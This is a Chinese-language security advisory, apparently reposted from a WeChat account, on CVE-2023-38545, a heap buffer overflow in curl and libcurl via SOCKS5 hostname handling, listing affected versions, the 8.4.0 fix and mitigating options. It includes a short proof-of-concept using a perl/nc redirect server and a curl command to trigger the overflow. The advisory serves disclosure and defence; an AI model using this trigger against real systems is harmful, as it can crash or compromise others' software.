【漏洞预警】Curl 和 libcurl 堆缓冲区溢出漏洞CVE-2023-38545

admin 2023年10月13日13:56:21评论33 views字数 1095阅读3分39秒阅读模式

【漏洞预警】Curl 和 libcurl 堆缓冲区溢出漏洞CVE-2023-38545

漏洞描述:

libcurl是一个跨平台的网络协议库,支持http, https, ftp, gopher, telnet, dict, file, 和ldap 协议。2023年10月10日,libcurl 团队发布 8.4.0 版本,新版本修复了两个安全漏洞,其中包含一个高危漏洞,官方指出该漏洞为很长一段时间以来 curl 遇到的最严重漏洞 (the worst curl security flaw in a long time),该漏洞同时影响到 libcurl 库和 curl 工具。此漏洞的触发需要配置使用socks5代理,且设置主机名参数为大于255长度的值,利用条件较为苛刻,且利用后大概率仅可以达到拒绝服务的效果,建议相关用户酌情升级。

while true; do { perl -e 'print ("HTTP/1.1 301 MovedrnContent-Length: 0rnConnection: ClosernLocation: http://");print("A"x65535);print("rnrn")'; sleep 2; } | nc -4l [yourip] 8000; done

curl -v --limit-rate 16384 --location --proxy socks5h://[remoteip]:1080 http://[yourip]:8000

【漏洞预警】Curl 和 libcurl 堆缓冲区溢出漏洞CVE-2023-38545

【漏洞预警】Curl 和 libcurl 堆缓冲区溢出漏洞CVE-2023-38545

影响版本:

7.69.0<=libcurl<=8.3.0

修复建议:
正式防护方案:

官方已修复该漏洞,建议用户更新到安全版本

安全版本:
libcurl >= 8.4.0

下载链接:
https://github.com/curl/curl/releases
由于依赖和使用 libcurl 的开源库和软件众多,包括但不限于Apple iOS、Android、Chrome OS、Git等,用户可关注相关产品的安全公告。

临时防护方案:
在 libcurl 和 curl工具 中使用 SOCKS5 代理相关功能可能触发此漏洞,客户可以关注是否使用相关选项:
1. 导致在 libcurl 中使用具有远程主机名的 SOCKS5 的选项:
- `CURLOPT_PROXYTYPE` 设置为类型 `CURLPROXY_SOCKS5_HOSTNAME`,或者:
- `CURLOPT_PROXY` 或 `CURLOPT_PRE_PROXY` 设置为方案 `socks5h://`

2. 导致在curl工具中使用具有远程主机名的SOCKS5的选项:
- `--socks5-主机名`,或者:
- `--proxy` 或 `--preproxy` 设置为方案 `socks5h://`

原文始发于微信公众号(飓风网络安全):【漏洞预警】Curl 和 libcurl 堆缓冲区溢出漏洞CVE-2023-38545

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年10月13日13:56:21
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞预警】Curl 和 libcurl 堆缓冲区溢出漏洞CVE-2023-38545https://cn-sec.com/archives/2104515.html

发表评论

匿名网友 填写信息